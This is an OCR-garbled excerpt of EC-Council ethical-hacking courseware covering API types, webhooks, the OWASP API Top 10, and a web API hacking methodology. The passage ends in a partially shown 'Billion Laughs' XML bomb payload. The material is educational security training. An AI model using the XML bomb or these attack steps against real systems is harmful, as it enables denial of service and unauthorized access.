Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Web Service APis

The most frequently used web service APls are listed below:
■ SOAP API: SOAP is a web-based communication protocol that enables interactions
between applications running on different platforms such as Windows, macOS, Linux,
etc., via XML and HTTP. SOAP-based APls are programmed to generate, recover, modify,
and erase different logs such as profiles, credentials, and business leads.
■ REST (Representation State Transfer) API : REST is not a specification, tool, or
framework; it is an architectural style of web service that serves as a communication
medium between various systems on the web. APls supported by the REST architectural
style are known as REST APls. Such APl-based computer systems, web services, and
database systems allow request ing machines to receive prompt access and redefine
web resource representations by providing a set of stateless protocols and qualitative
operations.
■ RESTful API : RESTful API is a RESTful service th at is designed using REST principles and
HTTP communication protocols. RESTful is a collection of resources that use HTTP
method s such as PUT, POST, GET, and DELETE. RESTful API is also designed to make
applications independent to improve th e overall performance, visibility, scalability,
reliability, and portability of an application .
APl s with th e following features can be referred to as t o RESTful APls:
o Stateless: The client end stores the st ate of the session; the server is restricted to
save data during the request processing
o Cacheable : The client should save responses (representations) in the cache. This
feature can enhance API performance

Module 14 Page 2089 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

o Client-server Environment: Both the client and the server should be independent of
each other because the server handles backend operations and the client is the front
end from where requests are made
o Uniform Interface: Resources must be specifically and independently recognized via
a single URL by employing basic protocol methods such as PUT, POST, GET, and
DELETE, and it should be possible to modify a resource
o Layered System: Multiple-layer architecture allows intermediary servers to supply
shared memory (cache) to achieve scalability because the client system directly
never notifies the main server of its connectivity.
o Code on Demand: An optional feature where the server can also provide temporary
executable code to the client, through which the client's functionality can be
customized
• XML-RPC: Extensible Markup Language - Remote Procedure Call (XML-RPC) is a
communication protocol that uses a specific XML format to transfer data, whereas SOAP
uses proprietary XML to transfer data. It is simpler than SOAP and uses less bandwidth
to transfer data.
■ JSON-RPC: JavaScript Object Notation - Remote Procedure Call (JSON-RPC) is a
communication protocol that serves in the same way as XML-RPC but uses the JSON
format instead of XML to transfer data.

Module 14 Page 2090 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

What are Webhooks?

Operation ofWebhooks
Webhooks are user-defined HTTP
callback or push APls that are raised
ba sed on events triggered, such as
receiving a comment on a post or
System-1 r Web/HTTP l System-2

pushing code to the registry

Webhooks allow applications to

Q
.....__
Ev~e nt_1 __.I· · ... •····· ····•····· POST Request · · ··· ·· ··· ··· •········ ····· ~
update other applications with
the latest information

.....__
Ev~
e ~t-2 __.~ ··· · · · ···•••··••· ·•• •·· ·••·•••·· ·•• ·•••·· · . ... . ... · · · · · · · .. · ···~
Webhooks are enrolled along with
the domain registration via user
I I
'i" ~ l J L 1
interface or API to inform clients
about the occurrence of a new
event

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

What are Webhooks?

Webhooks are user-defined HTTP callback or push APls that are raised based on events
triggered, such as comment received on a post and pushing code to the registry. A webhook
allows an application to update other applications with the latest information. Once invoked, it
supplies data to the other applications, which means that users instantly receive real-time
information. Webhooks are sometimes called "Reverse APls" as they provide what is required
for API specification, and the developer should create an API to use a webhook.
A webhook is an API concept that is also used to send text messages and notifications to mobile
numbers or email addresses from an application when a specific event is triggered. For
instance, if you search for something in the online store and the required item is out of stock,
you click on the "Notify me" bar to get an alert from the application when that item is available
for purchase. These notifications from the applications are usually sent through webhooks.
Operation of Webhooks

Webhooks are enrolled along with the domain registration via the user interface or API to
inform the clients about a new event occurrence. The generated path contains the required
code that automatically executes on the new event occurrence. Here, systems need not know
what should be run; they just need to trace the path to generate notifications.
A webhook is a powerful tool because everything remains isolated on the web. As shown in the
figure below, when system-2 gets a notification message from the selected path of the domain,
it not only becomes aware of new event occurrences on other machines but also responds to
them . The path contains the code that can be accessed via an HTTP POST request. It also
informs the user about from where the message has been triggered, including its date and time
and other details related to the event. Webhooks can be private or public.

Module 14 Page 2091 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

System-1 Web/HTTP System-2

,..__E_v e_n_t _1 _ _.I·.... •.... •........ • POST Request ...... • ................... ~

I
,..__
Ev_e_nt_ 2_ __,I···· ·······.. ·•.... ··.. ·.... ··.... ······•····.. ·· ·.. ··.. ···..~

__
Eve-~t-3 _I . . ·....·.....·........·.................· ................~
'ii

Figure 14.89: Operation of webhooks

Webhooks vs. APls

■ Webhooks are automated messages from websites to the server. APls are used for
server-to-website communication.
■ Webhooks get reports or notifications via HTTP POST only when a new update is made.
AP ls make calls irrespective of the data updates.
■ Webhooks update applications or services with real-time information. API needs
additional implementations to perform this activity.
■ Webhooks have less control over data flow. APls have easy control over data flow.

Module 14 Page 2092 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

OWASP Top 10 API Security Risks

Em-M.ltiitW Descri tion Description
e Exposu re of endpoints that ha ndl eobject identifiers, e API accidentally exposes internal variables o r objects
Broken Object res ul ti ng in the server component not t racking the due to improper binding and fi lterif'"€based on a
APll Level client's state properl y APl6 Mass Assignment whitel ist
Authorization e Allows the attacker to modify obj ect ID values and obtain e Al l ows attackers with unauthorized access to modify
unauthorized access to the data source object proper ties
e Vul nerabilities i n authentication mechanisms allow e Security mis configurations such as insecure default
Security
Broken User attackers to captureauthentication tokens, stea l user AP17 co nfi gurati ons, open cloud storage, permissive CO RS,
APl2 M i sconfiguration
Authentication identities, and perform attacks l ike credential stuffing and so on allow attackers to perform var ious attacks
and brute·forcing
e Accepting untrusted data for use as quer ies is a
e Devel opers may expose all of an object's properties to
vulnerability that leads SQL, LOAP, and XM L inj ection
Excessive Data the cl ients withou t considering thei r individua l sensitivity APIS Injection
APl3 e Al l ows attackers to trick the interpreter to execute
Exposur e e Allows attackers to retrieve mor e information than
malicious commands and gain unauthorized access
requested
e No restrictions on the number of resources requested by e Lack of version control for API hierarchies and older
Lack of Improper Assets
the client APl9 versions of APl s retains known vulnerabilities t hat
APl4 Resources and Management
can be exploited by attackers
Ra te Limiting e Allows attackers to consume all ava ilable resources,
res ulting in a DoSattack
e Lack of proper logging and monit oring along w ith
e Authorization flaws due to complexity in access control Insufficient missing or ineffective integration with incident
Broken policies r esponsecan make the system vulner able
APl10 Logging and
APIS Function Level
e Allows attackers toga in unauthorized access to Monitoring e Al l ows attackers to compromisethesystem, maintain
Auth orization
administrativefunctionsor user resources persistence, and pivot to other systems and networks

https://owosp.org
Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

OWASP Top 10 API Security Risks

Source: https://owasp.org
According to OWASP, the following are the top 10 API security risks:

API Risks Description

■ APls expose the endpoints handling object identifiers, and the server
Broken Object component does not track the client's state properly, resulting in a
APll Level massive attack surface level access control flaw
Authorization ■ Allows the attacker to modify the object's ID value and obtain
unauthorized access to the data source
■ Vulnerabilities in authentication mechani sms allow attackers to capture
authentication tokens and st eal user identities
Broken User ■ Attackers ca n easily compromise the API security using authentication
APl2
Authentication t okens and exploiting implementation flaws
■ APls are vulnerable to authent ication attacks such as credential stuffing
and brute-forcing
■ While designing the API, the developers may expose all t he object
Excessive Data propert ies to the clients without considering their individual sensitivity
APl3
Exposure and depend on the clients for filtering dat a
■ Allows attackers to retrieve more information than request ed
■ APls avoid enforcing restrictions on t he number of resources requested
by the client
Lack of
■ Allow attackers t o consume all the available resources, result ing in service
APl4 Resources and
unavailability t o legitim at e users, ca using Dos
Rate Limiting
■ May include authentication flaw s that ca n be exploited to perform brute-
force attacks

Module 14 Page 2093 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

■ Complexity in access control policies through different hierarchies,

Broken Function groups, and roles between administrative and regular functions can cause
APIS Level authorization errors
Authorization ■ Allow attackers to gain unauthorized access to administrative functions or
users' resources
■ APls accidentally expose the internal variables or objects due to improper
Mass
APIG binding and filtering based on a whitelist
Assignment
■ Allow attackers with unauthorized access to modify the object properties
■ Security misconfigurations include vulnerabilities such as insecure default
configurations, ad-hoc configurations, open cloud storage, misconfigured
Security HTTP headers, permissive cross-origin resource sharing (CORS), and
APl7
Misconfiguration missing TLS/SSL.
■ Allow attackers to perform various attacks and compromise the system
security
■ Sending untrusted data as queries to the interpreter may result in
injection flaws, such as SQL, LDAP, XML, and command injection.
APl8 Injection
■ Allow attackers to trick the interpreter by sending data to execute
malicious commands and gain unauthorized access

■ Improper asset management occurs due to a lack of version control for

Improper Assets
APl9 API hierarchies, and older versions of API consists of vulnerabilities that
Management
can be exploited by the attacker

■ Lack of proper logging and monitoring along with missing or ineffective

Insufficient integration with incident response can make the system vulnerable
APl10 Logging and ■ Allow attackers to compromise the system, maintain persistence, and
Monitoring pivot to other systems and networks to extract, tamper with, or destroy
data

Table 14.3: OWASP Top 10 API Security Risks

Module 14 Page 2094 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

API Vulnerabilities

IP:iJflfBM Description Vulnerabilities Description

8 Design flaws can cause serious vulnerabilities that
disclose information through unauthenticated public
1. Enumerated
APls
Resources
e Allows attackers to guess user IDs and easily
compromise the security of the user data
8 If the input is not sanitized, attackers may use
code injection techniques such as SQLi and XSS
5. Code Injections
e Allows attackersto stea l critical information such
as session cookies and user credentials

2. Sharing e API returns URLs to hypermedia resources like 8 Privilege escalation is a common vulnerability
Resources via images, audio, or video files that are vulnerable to present in APls with RBAC when changes to
6. RBAC Privilege
Unsigned URLs hotlinking endpoints are made without proper care
Escalation
8 Allows attackers to gain access t o user's sensitive
e Developers use third-party software libraries having information
3. Vulnerabilities
open-source software licenses
in Third-Party
e Neglecting regular updates and relegating the
Libraries
security fixes can result in many security flaws 8 Lack of proper ABAC validation allows attackers
7. No ABAC
to gain unauthorized access to API objects or
Validation
actions to perform view ing, updating, or deleting
8 CORS is a mechanism that enables the web browser
to perform cross-domain requests, and improper
4. Improper Use implementations of CORS can cause vulnerabilities 8 Many APls come with vulnerabilities in business
of CORS 8 Using the "access-control-allow-origin" header to 8. Business Logic logic
allow all origins on private APls can lead to Flaws 8 Allows attackers to exploit legitimate workflows
hotlinking
for malicious purposes

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

API Vulnerabilities
Modern web applications and Saas platforms use AP ls due to their extensive features, and most
of the API security mainly focuses on technical aspects. Poor management of API permissions,
flaws in business logic, and exposure of application logic and sensitive data such as personally
identifiable information (PII) drastically increase the attack surface and pave the way for
attackers to target these vulnerabilities to perform many attacks such as Dos and code injection
attack.
Some common API vulnerabilities are listed below:

Vulnerabilities Description
• Design flaws can cause serious vulnerability, disclosing information through
1. Enumerated unauthenticated public API
Resources • Allow attackers to guess user IDs easily, compromising the security of the
user data
• API return s URLs to hypermedia resou rces such as image, audio, or video files
that are vuln erable to hotlinking
2. Sharing
Resources via
• This can cause several problems such as poor analytics and strains on
reso urces, and ca n be used by attackers for exploitation
Unsigned URLs
• Signed URLs can be used to implement policies such as rate limiting, auto
expiration, and scoped sharing
• Developers use third-party software libraries havi ng open-source softw are
3. Vulnerabilities
licenses
in Third-Party
Libraries
• Avoiding regu lar updates and relegating security fixes can result in many
security flaws

Module 14 Page 2095 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

■ Cross-origin resource sharing (CORS) is a mechanism that enables the web

browser to perform cross-domain requests; improper implementations of
4. Improper Use
CORS can cause unintentional flaws
of CORS
■ Using the "Access-Control-Allow-Origin" header for allowing all origins on
private APls can lead to hotlinking
■ If the input is not sanitized, attackers may use code injection techniques such
as SQLi and XSS to add malicious SQL statements or code to the input fields
s. Code Injections on the API
■ Allow attackers to steal critical information such as session cookies and user
credentials.
■ Privilege escalation is a common vulnerability present in APls having role-
6. RBAC Privilege based access control (RBAC) where changes to endpoints are made without
Escalation proper attention
■ Allow attackers to gain access to users' sensitive information
■ No proper attribute-based access control (ABAC) validation allows attackers
7. NoABAC
to gain unauthorized access to API objects or perform actions such as
Validation
viewing, updating, or deleting

8. Business Logic ■ Many APls come with vulnerabilities in business logic

Flaws ■ Allow attackers to exploit legitimate workflows for malicious purposes

Table 14.4: API vulnerabilities

Module 14 Page 2096 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

Web API Hacking Methodology

Web-based API s ar e used for support ing heterogeneous devices such as m obile and I oT devices

To make th ese w eb-based API s more user friendly, developers are compromising o n th e aspect of security,
thereby making these w eb-based serv ices vulnera ble to various attacks

Identify the target

o~ :\e Detect security standards

======~ ~ } -========
Identify the attack surface
e f , •
Launch attacks

===============ff ~===========
Copynght Cl by EC-CIUIR:11 All Rights Reserved Reproduction IS Strictly Prohibited

Web API Hacking Methodology

Recent years have witnessed tremendous growth in the usage of web-based APls for supporting
heterogeneous devices such as mobile devices and loT devices. These devices frequently
communicate with backend web servers via APls. To make these web-based APls more user-
fri endly, developers are taking shortcuts to security, making online web services vulnerable to
various attacks. Attackers use various techniques to identify and exploit vulnerabilities in these
APls. To hack an API, attackers need to identify the API technologies, security standards, and
attack surface for exploitation.
Hacking a web API involves the following phases:
• Identify the target
• Detect security standards
■ Identify the attack surface
■ Launch attacks

Module 14 Page 2097 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved . Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Identify the Target

HTTP HTTP Reques t

8 A Pis such as SOAP and REST mostly use HTTP GET /doc/test.hbn1 HTTP/1 . 1 Request Line

}
protocol for communicating APl -based messages Host: - . certifiedhacke r .com
Accept: image/gif , imaga/jpag, •!•
Accept -Language: en-us Reques} Request
8 HTTP request and response headers are Accept-Encoding : gzip , defl ate
User-Agan t: Firefox/68.4.1
Headers ~:~;:re
transmitted in plaintext, so an att acker can easily Content-Length: 35
manipulate these headers to identify the target Blank line separating Header and Body
bookld,..78906,author-:Rob+ert
}- Request Message Body

HTTP Response
Message Formats
BTI'P/1.1 200 OK - Status line
e API messages transmitted over the web will take

}
Date: SUn, 05 Jan xxxx 01 : 11: 12 GM'l'
Server : Apache/2 . 4 (Win32)
some format, such as JSON for REST AP I or XML
for SOAPAPI
Last-Modified: Sat, 11 Jan xx.xx
ETag: " 0-23-4024c3a5"
Accept-Ranges: bytes
espons}
Headers
Response
Message
Hea der
Content-Length: 35
8 Using vulnerabilities in these formats, an attacker Connection: c lose
can easily manipulate messages to identify the Content-Type: text/html
Blank line separating Header and Body
target and its perimeter <hl> My Hana page</hl>
}- Response Message Body

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Identify the Target

Before hacking an API, an attacker first needs to identify the target and its perimeter:

■ HTTP: APls such as SOAP and REST mostly use the HTTP protocol for communicating APl-
based messages. The HTTP protocol is a text-based protocol where the header
information is transmitted in a readable format. For example, consider the following
HTTP Request and Response headers:

HTTP Request

GET /doc/test. html HTTP/1 . 1

Host: www.certifiedhacker . com
Accept: image/gif, image/jpeg, */* Request
Accept-Language: en-us Request
Message
Accept-Encoding : gzip, deflate Headers
User-Agent: Firefox/68.4 . 1 Header
Content-Length : 35
- - - - - - - - - - - - - - -.....-----i.,.. Blank line separating Header and Body
bookld=78906&author=Rob+ert Request Message Body

Figure 14.90 : Example of HTTP Request header

Module 14 Page 2098 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

HTTP Response

HTTP/1. 1 200 OK
.....
- Status Line
r
Date : Sun, 05 Jan xxxx 01 : 11 : 12 GMT
Server : Apache/2.4 (Win32)
Last-Modified : Sat , 11 Jan xxxx Response
ETag: " 0-23-4024c3a5" Response
Message
Accept-Ra n ges : bytes ► Headers
Header
Content-Length: 35
Connection : c lose
Content-Type : text/html ~
.... Blank line separating Header and Body

~
<h l > My Home page</hl> Response Message Body

Figure 14.91: Example of HTTP Response header

As shown in the figure, both HTTP Request and Response headers are transmitted in
plaintext; an attacker can easily manipulate these headers to identify the target.
• Message Formats: The API messages transmitted over the web will take some format
such as JSON for REST API and XML for SOAP API. If these formats are used incorrectly,
they can pave the way for vulnerabilities. As these formats are easy to understand, an
attacker can easily manipulate messages encoded in these formats to identify the target
and its perimeter.

Module 14 Page 2099 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Detect Security Standards

APls such as SOAP and REST implement different authentication/authorization standards such as OpenlD
Connect, SAML, OAuth l.X and 2.X, and WS-Security

SSL provides transport- level security for API messages to ensure confidentiality through encryption and
integrity through signature

~
L most of the AP ls, SSL is used to encrypt only sensitive user data such as credit card details, thereby
leaving other information in plaintext

If these security standards are configured improperly, an attacker can identify vulnerabilities in these
standards forfurther exploitation

Copynght Cl by EC-CIUIR:11 All Rights Reserved Reproduction IS Strictly Prohibited

Detect Security Standards

Although APls claim to be secure as they incorporate security standards such as OAuth and SSL,
they still include many vulnerabilities that can be exploited by attackers.
■ APls such as SOAP and REST implement different authentication/authorization
standards such as OpenlD Connect, SAML, OAuth 1.X and 2.X, and WS-Security.
■ SSL provides transport-level security for API messages to ensure confidentiality through
encryption and integrity through signature. Although SSL is used for security, in most API
messages, only sensitive user data such as credit card details are encrypted, leaving
other information in plaintext.
If these security standards are configured improperly, an attacker can identify vulnerabilities in
these standards for further exploitation. For example, an attacker can capture and reuse a
session token to retrieve a legitimate user's account information that is not encrypted.

Module 14 Page 2100 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Identify the Attack Surface

Swagger Definition
API Metadata Vulnerabilities
@ API metadata reveals a lot of technical information
-api~:{ [ ~ nt ofattack J
path: "/cust/{custld} ",
such as paths, parameters, and message formats that
- operati ons: [ ~ PMethod:Are ~
are useful in performing the attack - { mathod: "DELETE" , ~
suamary: "Del etes a cus t aner",
@ REST API uses metadata formats such as Swagger, notes: " ",

RAML, API-Blueprint, and 1/0 Docs, whereas SOAP API typa : " void.'' ,
nickname : " deleteCus t ", Oauth 2.0: ar e tokens enforced
uses WSDL/ XML-Schema, etc. - a utho riza tio n s : {
- oauth2:
-(
[ ...-.=-----------' and va lidated correctly?

scope : "write : custs",

da s cri ption: " m::xiify custs in your account"
}
API Discovery I I s access validated? A re IDS
}, sequential? Injection point?, etc.
@ If an API does not use metadata, attackers monitor and - parameters : [
- (
record the communication between the API and an name : " custid",
existing client to identify an initial attack surface description: "Cust id to delete",
required : tn.ie ,
type : " string'',
@ Attackers use automated tools to generate metadata param'l'ypa: "path",
a110tlM.lltipl e : false
from the recorded traffic
I ,

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Identify the Attack Surface (Cont'd)

Analyz e Web API Requests and Responses
0 0 0 ,•.,,

@ Attackers can use tools

~- "' - ,? l!I Documenl.ltlon
such as Postman and
- l!'J l'lllplJ/._twltlOI.CiOffi/2J!.- lhtJ

ReqBin to intercept and

anaylze the target w eb Ei)200 S..:.....a - ~ 1 o..,,--

APls, websites, and web

"' Eil l'OOS.C.-.-.Ao,q..o1 11.-,

Ei]toO SUeon.o " - -'

services ei 200 ~ -....,

Hl 200Sl,cotu - Otl-
Hl'211- UMII C-
Ei.ilOO s..cctu ·OlltltCI
0

Postman e,- - a1-.,-,-.Jd,'-""lh,._.....,.,...t_

e,- s._-..,.....,..._._...,.........
e,-. a d_.,_,..,.,._........,_.Jd...,,_~__,,
@ Po stman allows attackers e, ea,
lcl 140l2M1196111&2M20
~009""'"-
_ -1~--"'""P
_.....,ra-l)Ul:,l,<.......,,.1,...i_ I O_

to capture API traffic, e,r..._ 1-...'90')'. . ., , , ._ _ ,e.,... _

Q20001< - - ,,... -~
aHicle,.,...
including requests, f, S - - Twet'\1 {) ;:ij liJ 0..
a,-..,$1,_ (),l..i,,10.,.,..,C-•1..,._
responses, and cookies, ~-..,Olll'IOf""°""'II_.,.
e,- - "td" :"1-'83Jt6ut6616~ 1'",
using the proxy built into "tut" : "Dono•M> llltcllell ,_,t - il.fter • <ollh t ot1 •1th hul C.Or·• t- ti,_
- o f " - 2, httl)o:l/t ,<o/ Y"111Xh111.DII"
Po stman I
ll q,,....... -.... Q,,:o,,,,.. https://www.postmon.com 00N - e_...., s•.- I - - Ill

COpynght Cl by EC-C1uncil All Rights Reserve d Reproduction IS Strictly Prohibited

Identify the Attack Surface

After identifying the target API to attack and its security implementations, an attacker needs to
identify the attack surface for launching the attack. It is very easy to find an attack surface for
Ul-based applications, as we can see various input fields on the web pages. However,
identifying the attack surface for an API is different as there are no built-in UI fields; we can
only see an API endpoint. To identify an attack surface of an API, attackers need to understand
the APl's endpoints, messages, parameters, and behavior.

Module 14 Page 2101 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Use the following techniques to identify the attack surface of the target API:
• API Metadata Vulnerabilities

API metadata reveals a large amount of technical information such as paths,

parameters, and message formats, which is useful for performing an attack. REST API
uses metadata formats such as Swagger, RAML, API-Blueprint, and 1/0 Docs, while SOAP
API uses WSDL/XML-Schema, etc. For example, consider the following code snippet of
Swagger that reveals technical information.

Swagger Definition

-apis :
- {
[

path: " / cust/ {custld} ",

~
- operations: [
HTTP Method: Are other
- {
methods handles correctly?
method: " DELETE", --===--,_ _ _ _ _ _ _ _ __
summary: " Deletes a customer",
notes : " ",
type : " void",
nickname: " deleteCust", Oauth 2.0: are tokens enforced
- authorizations: { and validated correctly?
- oauth2: [ _ ; ; ; ; : : ; ; _ . - - - - - - - - - - - - -
-{
scope : "write:custs",
description : "modify custs in your account"
}
]
Is access validated? Are IDS
} ,
-parameters :
- {
name: " custld",
description : " Cust id to delete",
required : true , ---------
What if we send
type : " string",
paramType: " path",
allowMultiple : false

] ,

Figure 14.92: Example of Swagger definition

Attackers can exploit vulnerabilities in these definitions to perform various attacks on

APls.
• API Discovery

If an API does not have metadata, attackers monitor and record the communication
between the API and an existing client to identify the initial attack surface. For example,
an attacker may use a mobile app that uses target the API, configure a local proxy for
recording traffic, and finally configure the mobile device to use this proxy to access the
API. Then, the attacker uses automated tools to generate metadata from the recorded
traffic.

Module 14 Page 2102 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

■ Brute Force
If none of the abovementioned techniques works, the attackers try to identify the API
paths, arguments, etc., through brute-forcing. Common API paths used by developers
include api, /api/v2, /apis.json, etc. Furthermore, some APls such as hypermedia allow
retrieving links and parameters related to an API response. This information helps
attackers to identify the attack surface.
■ Analyze Web API Requests and Responses
Attackers can use tools such as Postman and ReqBin to intercept and analyze the target
web APls, websites, and web services.
o Postman
Source: https://www.postman.com
Postman allows attackers to capture API traffic, including requests, responses, and
cookies, using a built-in proxy. Postman interceptor can catch requests and
responses, and Postman's proxy runs inside the Postman appl ication and can be
used with HTTP or HTTPS websites.

11
0 Home Workspaces "' Reports Explore

@ Twfttef's Public Workspac:e New Import Sr,gll! Twe-et

+ - No env,omment v @

CJ Twitter API v2 Tweet Lookup Slngle Tweet lci Save .., I!) Docu mentation X
v Tw!UerAPlv2

_,_ Fo,1,-

.., El Tweet Lookup

Eil 200 Success • ~ •1

GET ..,

Paranis

Ouer, P6f•m•
nups:l/apl.tw,tter.com/2/tweetsJ:ld

Aulhof!lltton Headefl Body Pre-request ~ I s Tests Sett!l19S Cookies

e'l

(/)
hUps://apl.twrtter.com/2/lweetsJ:ld

Thts tndpoinl re1~m Mtails lboul the Tweet lp&cifled

by the reQuHU!d 10

© Fot full deta.1, see the APt refetence lot ll'III eOOpo,nt
Eil 200 Success • Aequffl ~ - Bull ltd11 Presets

Eil 200 Success - Request Authorisation Bear r token

11uct1rner,1s,.,1hol'_ld,con1e~L•nnota1,ons,converutlo
la!
Ei) 200 ~ H • Reques! This request IS using an aulhonzalJOn helper from
Comma-se,p,,rated h t ol f~s to expand . Expansions e
coilection!!,,netAPlv2
Ei)200SOCCMS - Oefaull
1,3 mediafIelds dur1110n..ms.heigtlt,rnediUey,non_pyblic_metrics,or9an
Eil 429 Rate Um11 b:cee<h. Request params
pol.fields Com-na•sepa,ated list ol fields for the pol o biect. Expl
Ei] 200 Success - Deleted
0 ,.. Single Tweet Us«context
place.field s Comma-sepa,ated list of rields for the place object. Exp twHl.lields Conwna-~ated 1ts1 of r~s for the
Tweelobie<=I.
a MW!ple Tweets usedields Coffwmo-5ep¥ated 1rs1 ol lietds for the user ob )e<:t Expl

El Use. Lookup Allowed values

411achrnents.&Uth0f_!d,contexLannotat10n
el--• duc:rlptlon Bulk edit Presets s,conversa110n..ld.crea1ed__111,en1111es.geo,1
e)Blocks d,fLreply_to_user_lCl,lang,1'101\_puOIH:_metr
II Id 1403216129661628420 Required Enler a shgle Tweet 10.
lcs,Ofgar,ic_me11ics,pos11bty_sens1!1ve,p,o
e) Likes
motecune11ics.public..metrw::s.,ele<enced_
el Tlffillines Body Cook.ies Headers Test RHIJRs Q, 200 01( A81 rns 73A B Save Response 1wee1s.rep1y_se1ungs,source.te11,w ,1hheld

E,HideRfl)lles
0alaurt¥aloHld.lUI
El Search TWHII Preuy Raw Preview Visualize JSON ..,

El Fltteted StrfffflS OAuthl 04 Vs.er Conte~\ aut honnt,on

"data" : ( reqi,.ed rl any of the ro11ow1ng l,elds are
cl Sampled Stteams
"id" : "1403216129661628'20-, inauded ,n the request

"text • : "Donovan Mitchell • e nt clOlffl a ft er a collision •1th Paul Geor ge toward t he non....publlc._metrics,otg41YC_metric11,promo
and of G.uia 2. h t tps ://t. co/V91hXhDLDN"
V,ew complete collection doa.wnentauon ➔

Im 0.. Find and Replace ~ Col'lsole 0 OH1<topagenl 9 Bool:c.,,p 0 R!.Wlnaf 8 Trash 8:1 ©

Figure 14 .93: Screens ho t of Post man

Module 14 Page 2103 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Launch Attacks

Fuzzing Login/Credential Stuffing Attacks

Invalid Input Attacks API DDoS Attacks

Malicious Input Attacks Authorization Attacks on API

Injection Attacks Reverse Engineering

Insecure SSL Configuration User Spoofing

Insecure Direct Object References (IDOR) Man-in-the-Middle Attacks

Insecure Session/Authentication Handling Session Replay Attacks

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Fuzzing and Invalid Input Attacks

Fuzzing

Attackers use the fuzzing t echnique t o repeatedly send random input t o the t arget API to generate error
messages that reveal critical info rmation

To perform fuzzing, attackers use automated scripts t hat send a huge number of requests w ith a varying
combinatio n of input paramet ers t o achieve the goal

Invalid Input Attacks

Attackers w ill give invalid inputs t o the API, such as sending t ext in place of numbers, numbers in place of
t ext , more characters th an expected, null charact ers, etc. t o extract sensitive information fro m unexpected
syst em behavior and error messages

Attackers also ma nipulate t he HTTP headers and values targeting both API logic and HTTP protocol

COpynght Cl by EC-C1uncil All Rights Reserve d Reproduction IS Strictly Prohibited

Module 14 Page 2104 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Malicious Input Attacks

XML Bomb Attack Code
Malicious Input Attacks
<?xm1 version=" l .0" encoding="utf-8 "?>

< ! DOCTYPE lolz [

Attackers inject malicious input directly to
target both an API and its hosting
infrastructure
< !ENTITY l ol " lol">
< !ENTITY loll " &lol ;&lol ;&lol ; &lol ; &lol ; &lol ; &lol ; &lol; &lol ;&lol ;">
<!ENTITY lol2
"&loll ; &lol l; &loll ; &loll ;&loll; &loll; &loll ; &lol l ; &loll ; &loll ;">

To perform this attack, attackers use < !ENT IT Y lol3

malicious message parsers using XML
Another way attackers perform this attack
is by uploading malicious script files, for
example uploading shell script instead of
a pdf document
This may result in executing the malicious
script to bypass the security mechanisms on
the server or propagating the script to other
"&lol2 ; &l o l 2; &1012; &1012 ;&lol 2; &lol2 ; &1012; &101 2 ;&lol2 ; &lol2; ">
<!ENTITY lol4
"&lol3 ; &l o l 3 ; &lol3 ; &101 3 ;&lol 3 ; &lol3; &1013; &l ol3 ;&l ol 3; &lol3; ">
< !ENTITY lolS
